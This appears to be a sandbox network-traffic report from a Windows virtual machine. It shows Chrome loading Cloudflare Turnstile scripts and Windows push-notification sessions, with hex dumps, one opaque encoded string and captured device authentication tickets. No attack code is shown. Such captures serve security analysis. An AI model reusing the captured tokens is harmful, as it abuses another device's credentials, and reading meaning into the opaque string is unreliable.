                        Data Ascii: YTTveYTzvezzYeYTzzeYTTYeYTYYeYTvveaYYeaazeYTzTeaazeYTvTevzYeYTzTevaTeaazevaveYTzTeYTT1000veYTYaeYTTveaazeYTzYeYTTvevaTevavezTYezTaevzvevaTeYTzvevaveYTTTeYTvveYTvYeYTvYeYTTveYTTTeYTzvevzYeaazevzvevaTeaazevaveYTTTeYTvveYTvYeYTvYeYTTveYTTTeYTzvevzYeYTzTe


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.649732104.17.2.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:12 UTC523OUTGET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:12 UTC408INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:12 GMT
                        Content-Type: application/javascript; charset=UTF-8
                        Content-Length: 42691
                        Connection: close
                        accept-ranges: bytes
                        last-modified: Thu, 27 Jun 2024 13:08:16 GMT
                        cache-control: max-age=31536000
                        access-control-allow-origin: *
                        cross-origin-resource-policy: cross-origin
                        Server: cloudflare
                        CF-RAY: 89d6efdcab717279-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-07-03 12:39:12 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 2c 61 2c 72 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 75 5d 28 67 29 2c 5f 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 6c 29 7b 72 28 6c 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 61 28 5f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 5f 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 61 2c 72 29 3b 66 75 6e 63 74
                        Data Ascii: "use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);funct
                        2024-07-03 12:39:12 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 74 28 65 2c 61 29 7b 76 61 72 20 72 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 72 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 62 3b 74 72 79 7b 66 6f 72 28 72 3d 72 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 72 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 61 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 61 29 29 3b 63 3d 21 30 29
                        Data Ascii: t(e){if(Array.isArray(e))return e}function It(e,a){var r=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(r!=null){var o=[],c=!0,u=!1,g,b;try{for(r=r.call(e);!(c=(g=r.next()).done)&&(o.push(g.value),!(a&&o.length===a));c=!0)
                        2024-07-03 12:39:12 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 6c 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 6c 5b 30 5d 26 26 28 72 3d 30 29 29 2c 72 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 6c 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 6c 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 6c 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 6c 3d 5b 6c 5b 30 5d 26 32 2c 75 2e 76 61 6c
                        Data Ascii: ])}}function _(l){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,l[0]&&(r=0)),r;)try{if(o=1,c&&(u=l[0]&2?c.return:l[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,l[1])).done)return u;switch(c=0,u&&(l=[l[0]&2,u.val
                        2024-07-03 12:39:12 UTC1369INData Raw: 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 6b 65 7c 7c 28 6b 65 3d 7b 7d 29 29 3b 76 61 72 20 78 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 78 65 7c 7c 28 78 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 5a 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74
                        Data Ascii: ,e.LIGHT="light",e.DARK="dark"})(ke||(ke={}));var xe;(function(e){e.NEVER="never",e.AUTO="auto"})(xe||(xe={}));var X;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(X||(X={}));var Z;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="aut
                        2024-07-03 12:39:12 UTC1369INData Raw: 3d 3d 22 61 75 74 6f 22 7c 7c 67 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 6b 74 3d 33 30 30 2c 4c 74 3d 31 30 3b 76 61 72 20 6a 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 76 61 72 20 61 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                        Data Ascii: =="auto"||gr.test(e)}function at(e){return N(["always","execute","interaction-only"],e)}function it(e){return N(["render","execute"],e)}var kt=300,Lt=10;var j="0/0";function ot(e){var a=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._de
                        2024-07-03 12:39:12 UTC1369INData Raw: 59 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 59 28 65 2c 61 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 61 26 26 61 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65
                        Data Ascii: Y=Object.setPrototypeOf||function(o,c){return o.__proto__=c,o},Y(e,a)}function Bt(e,a){if(typeof a!="function"&&a!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(a&&a.prototype,{constructor:{value
                        2024-07-03 12:39:12 UTC1369INData Raw: 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 59 28 63 2c 6f 29 7d 2c 50 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 58 74 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 26 26 28 43 28 61 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 61 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 61 3a 4c 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 59 74 28 65 29 7b 76 61 72 20 61 3d 4d 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 74 65 28 65 29 2c 63 3b 69 66 28 61 29 7b 76 61 72 20 75 3d 74 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 75 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69
                        Data Ascii: !0,configurable:!0}}),Y(c,o)},Pe(e)}function Xt(e,a){return a&&(C(a)==="object"||typeof a=="function")?a:Le(e)}function Yt(e){var a=Me();return function(){var o=te(e),c;if(a){var u=te(this).constructor;c=Reflect.construct(o,arguments,u)}else c=o.apply(thi
                        2024-07-03 12:39:12 UTC1369INData Raw: 24 74 28 65 2c 61 29 7b 76 61 72 20 72 2c 6f 2c 63 2c 75 3d 75 74 28 61 2e 70 61 72 61 6d 73 2c 4b 29 2c 67 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 67 22 2c 22 2f 22 29 2c 62 3d 22 22 2e 63 6f 6e 63 61 74 28 75 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 67 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 45 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2c 5f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 5f 7c 7c 70 28 22 43 61 6e 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20
                        Data Ascii: $t(e,a){var r,o,c,u=ut(a.params,K),g="h/".concat("g","/"),b="".concat(u,"/cdn-cgi/challenge-platform/").concat(g,"feedback-reports/").concat(Ee(e),"/").concat(a.displayLanguage,"/"),_=document.getElementById(e);_||p("Cannot initialize Widget, Element not
                        2024-07-03 12:39:12 UTC1369INData Raw: 76 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 76 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 76 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 76 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 76 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 76 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 76 2e 73 74 79 6c 65 2e
                        Data Ascii: v.setAttribute("allow","cross-origin-isolated; fullscreen"),v.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),v.setAttribute("scrolling","no"),v.style.borderWidth="0px",v.style.width="100%",v.style.height="100%",v.style.
                        2024-07-03 12:39:12 UTC1369INData Raw: 66 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 35 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c 22 31 38 22 29 2c 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 2c 68 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 76 29 2c 68 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 2c 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 68 29 2c 28 63 3d 5f 2e 70 61 72 65 6e 74 4e 6f 64 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 63 3d 3d 3d 76 6f 69 64 20 30 7c 7c 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28
                        Data Ascii: f"),d.setAttribute("fill","none"),d.setAttribute("x1","6"),d.setAttribute("x2","18"),d.setAttribute("y1","5"),d.setAttribute("y2","18"),n.appendChild(d),h.appendChild(v),h.appendChild(n),l.appendChild(h),(c=_.parentNode)===null||c===void 0||c.appendChild(


                        Session IDSource IPSource PortDestination IPDestination Port
                        14192.168.2.64973340.113.103.199443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:12 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 39 68 2f 69 6a 68 57 65 30 2b 78 50 4a 76 64 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 66 66 39 32 38 64 36 63 38 37 66 61 63 65 36 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: b9h/ijhWe0+xPJvd.1Context: fff928d6c87face6
                        2024-07-03 12:39:12 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:39:12 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 62 39 68 2f 69 6a 68 57 65 30 2b 78 50 4a 76 64 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 66 66 39 32 38 64 36 63 38 37 66 61 63 65 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: b9h/ijhWe0+xPJvd.2Context: fff928d6c87face6<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:39:12 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 62 39 68 2f 69 6a 68 57 65 30 2b 78 50 4a 76 64 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 66 66 39 32 38 64 36 63 38 37 66 61 63 65 36 0d 0a 0d 0a
                        Data Ascii: BND 3 CON\QOS 56MS-CV: b9h/ijhWe0+xPJvd.3Context: fff928d6c87face6
                        2024-07-03 12:39:12 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:39:12 UTC58INData Raw: 4d 53 2d 43 56 3a 20 55 31 79 6f 47 66 6e 64 43 45 61 54 77 45 5a 52 45 45 54 62 74 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: U1yoGfndCEaTwEZREETbtw.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination Port
                        15192.168.2.64973440.113.103.199443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:12 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 48 6f 45 72 73 55 45 64 74 30 75 62 36 4c 31 48 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 66 66 61 30 65 35 62 39 61 32 65 61 62 64 38 0d 0a 0d 0a
                        Data Ascii: CNT 1 CON 305MS-CV: HoErsUEdt0ub6L1H.1Context: 8ffa0e5b9a2eabd8
                        2024-07-03 12:39:12 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                        2024-07-03 12:39:12 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 48 6f 45 72 73 55 45 64 74 30 75 62 36 4c 31 48 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 66 66 61 30 65 35 62 39 61 32 65 61 62 64 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 77 73 46 52 75 4b 50 31 71 51 66 6b 2f 66 53 43 56 6b 4a 2b 72 55 4c 71 62 42 6f 6a 52 54 6b 46 64 54 55 53 49 30 2f 2f 5a 2f 4d 4e 4d 64 51 54 41 68 36 4d 5a 48 36 62 6a 71 33 51 75 4f 50 42 65 33 48 7a 6e 76 42 69 48 34 5a 47 66 67 33 58 73 33 58 4f 37 76 61 65 74 78 74 58 5a 46 36 51 7a 68 35 7a 34 41 38 73 38 55 78 32
                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: HoErsUEdt0ub6L1H.2Context: 8ffa0e5b9a2eabd8<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYwsFRuKP1qQfk/fSCVkJ+rULqbBojRTkFdTUSI0//Z/MNMdQTAh6MZH6bjq3QuOPBe3HznvBiH4ZGfg3Xs3XO7vaetxtXZF6Qzh5z4A8s8Ux2
                        2024-07-03 12:39:12 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 48 6f 45 72 73 55 45 64 74 30 75 62 36 4c 31 48 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 66 66 61 30 65 35 62 39 61 32 65 61 62 64 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: HoErsUEdt0ub6L1H.3Context: 8ffa0e5b9a2eabd8<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                        2024-07-03 12:39:12 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                        Data Ascii: 202 1 CON 58
                        2024-07-03 12:39:12 UTC58INData Raw: 4d 53 2d 43 56 3a 20 52 2f 4e 35 32 54 63 43 53 30 71 2b 79 5a 58 6e 75 43 36 70 68 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                        Data Ascii: MS-CV: R/N52TcCS0q+yZXnuC6phg.0Payload parsing failed.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.649735104.17.3.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:12 UTC754OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/wtoc0/0x4AAAAAAAeHHZ3q51Y71L9P/light/normal HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: iframe
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:12 UTC1362INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 79432
                        Connection: close
                        cross-origin-embedder-policy: require-corp
                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                        origin-agent-cluster: ?1
                        cross-origin-opener-policy: same-origin
                        document-policy: js-profiling
                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
